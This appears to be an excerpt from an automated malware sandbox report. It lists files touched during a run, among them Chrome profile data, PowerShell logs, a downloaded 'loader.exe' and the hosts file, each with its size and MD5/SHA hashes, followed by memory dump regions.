Filesize
7KB

MD5
24b29271fd80e79f98db0736e69d8fd3

SHA1
41f40f84ac6d85035e46d18675d26ece91b765bf

SHA256
0327252e9dcf1da0bc1f81a87ca22af0032fc6e384bb1fc86a9d6a398aa3c2a4

SHA512
6172fa744e095ca28c1871b47d5730aec47496cc814f087d9ae86b357d60b348bbfd18022daa3a88a87793895b2a6b37ef5213121c8c31b28c11bc33f1c90b26

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
16KB

MD5
769d8ebf0869b83e5f9db47d31c346cb

SHA1
c2375b3133ce72c753b84e312db66edcf8f54d62

SHA256
407f02f18ae7bc199b5cfa6808f8f0d2a0a2c93a351201b359a0ede828140c46

SHA512
bdaeb8bc04a6e6c36536719772a4726612474169e1d7030db2f48e01088f709b18dc0c0764ce84dadf325d37bfd5d458c692b021912047a1a089e3593bd2b351

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

Filesize
15KB

MD5
46ae621a4964115f591a10c02f8cd657

SHA1
fa4a7b11eff3315673bb5bf4c5934d6061b19e74

SHA256
dd94f4d4e9b378b662593dc3210bc8801ae883c666170a753c4f140da0614a9c

SHA512
0bae45ae61b2617a5ab54fc0a4c6883c99ec717f335226a63c90e338be8e52e39919deee91ebc5bf0e6a266cf6cc39b8941bdceacc0633f6826de43454719dfe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
140KB

MD5
9b2ce9220cfda30432f277db6553fd25

SHA1
98e43695093c2aa4ad9e4c962f81a3c5966d4df8

SHA256
29c28936f92f223f33c4b53abc56837a76704ad774d9871e0b0cf067ce93e640

SHA512
0ed378c0b11cc7ea6fc19d3195f651ee351822ade026a0780ccc2438e8ccd28f42b6dc0db73ec66b2236f203425a5d1fe4f64d2b99bc13df87e1ed70bb8cb05e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
283KB

MD5
d3200cb4014a6a60df272449b5708acf

SHA1
c092985163670fbcd0958909d8f63fc381018f67

SHA256
a2b6837b49350385c6c7e1d0f30064946fb08f9e47eef1fe04f36beddc07e08f

SHA512
c4411ddee8370b1dc4782899cde8d85d90893c5d9c684ee9675d6d3b88aad0dabdc60a897283f205a7d88682b4ed061c0b116b8c119a9507c5dc1fa658099a71

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
102KB

MD5
757162b4f63d31b6a705e19ec9d9e053

SHA1
eac10167db47523cfd367408ac92ea3c611f1563

SHA256
d1a9b398eab8250d8fe271418f53f19cf9bf61743e7f2593cd1986a2120de6d1

SHA512
d96c1a68d00f51a1d0777b378baa98e030b162afa1eb9664df84c58d762e1d0d100f1643f6386f83495be65e93e877c717e400025584b528b19379043ea7ce1d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe583f85.TMP

Filesize
83KB

MD5
c5f60c48bf1855fcfd4d17b4750cbeee

SHA1
cbd6b3b6665a838b0412a05658b8750bb2d3b4be

SHA256
9fa363967a2123fd104c7633559058845bce078d3d5af934a82b9bd6829e0a11

SHA512
d45bf52a874051f9a26b8e750834b66b64b8b3823580bc4e4d9764a342a2c2cb90aecc5b188f293b47877028280b54509cde8f1840b59a217b3701749dc3ecb3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\e3347fde-0879-4123-a266-8f53bd3ef172.tmp

Filesize
283KB

MD5
c0fec372d7413f3a8c4b49b772b123f8

SHA1
e5196807ed9886c37181fcf6d7c901c3a4238c03

SHA256
b9bbaf2a1e357d109d0ad4cba6779f0884199a7b644e02c594c05fc13852b79d

SHA512
3003919bd1a686c3f9ec8238fe25fe4d3cd7de518fb9f132d1cf2abe8e49070d2f5004f3644e95ed33d0424a64736ce886eac5b366a03f390112ebf45ae2de99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
05b3cd21c1ec02f04caba773186ee8d0

SHA1
39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

SHA256
911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

SHA512
e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
a0e27123ec2730bd5d89828fd6a41cc2

SHA1
d1099e93025598a470d6cc9c0549595e8f8e9a7f

SHA256
fda70f35a9cbde9e93461cd72d0c668f964d8b07e5c43322e47ed602ceb177a9

SHA512
b73fba4357362fa2057fe5216490da71958e1edb6fd08fe7cd99d214a8a1a5381ff304584c7969cedfb790170ecd65cbe96e006c5d2e41ceff587138ba244d31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ac871344dc49ae49f13f0f88acb4868

SHA1
5a073862375c7e79255bb0eab32c635b57a77f98

SHA256
688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37

SHA512
ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
386ac3dd4d75fbabf73b1e26d851f8e0

SHA1
4e5bfb4f747c1b3b1af89660859033250824e7ef

SHA256
19a9f96108dffae20ca67c47e22c070947edfbb3c7af9e5ec3f7890cc8e05663

SHA512
8563d3915d9c7a40716fec899a656b5be112082fa4a7dd9b033fe37f1de70df16d2d6d14afd51a4010daa3d68ee66e5cea948c601f0812b1911b33bc5d202ecc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jk3szjlv.22c.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 238373.crdownload

Filesize
254KB

MD5
ce298bde4b5d1231f937e3c434275dc0

SHA1
8dc7b79f0c7abd7c11fdddd6d102bcf5cf11e4f7

SHA256
36734bbdc99849c42ec7ee00791c0d62847c0e90e570433711c014bae6b69079

SHA512
79ea7640fb1abc8ad4d36a28cbb342fc0be563f9fc5fc9ad07dd5ca3cde24f5d5c4d1d2c09f0bfb6e8206cef6bff9ebfd626d020527ad8e7754afc1fc2f0ea1a

Download Submit
C:\Users\Admin\Downloads\loader.exe:Zone.Identifier

Filesize
198B

MD5
0f38f299bb3b244724b2ad58850f1a07

SHA1
15a0290f735c287fdbce81a39db484933aa11aac

SHA256
790b3d04b78932908bde04fc4817619966777d01710e49a6ec9cc399a228920c

SHA512
fe7d5459351fda085051e3466e0d5120d03f97c6cd323bc7c8e899248256386c77a1042407c8211ffe4f48e808ed84a6c0401e77427910fb11cc82997107f43c

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/2276-382-0x00007FFD84D20000-0x00007FFD857E2000-memory.dmp

Filesize
10.8MB

Download
memory/2276-362-0x000001C464BA0000-0x000001C464BAA000-memory.dmp

Filesize
40KB

Download
memory/2276-363-0x000001C464DC0000-0x000001C464DD2000-memory.dmp

Filesize
72KB

Download
memory/2276-328-0x000001C464B10000-0x000001C464B2E000-memory.dmp

Filesize
120KB

Download
memory/2276-296-0x00007FFD84D20000-0x00007FFD857E2000-memory.dmp

Filesize
10.8MB

Download
memory/2276-291-0x000001C44A520000-0x000001C44A566000-memory.dmp

Filesize
280KB

Download
memory/2276-290-0x00007FFD84D23000-0x00007FFD84D25000-memory.dmp

Filesize
8KB

Download
memory/2276-324-0x000001C464B50000-0x000001C464BA0000-memory.dmp

Filesize
320KB

Download
memory/2276-323-0x000001C464D20000-0x000001C464D96000-memory.dmp

Filesize
472KB

Download
memory/2528-297-0x000001F9E6120000-0x000001F9E6142000-memory.dmp

Filesize
136KB

Download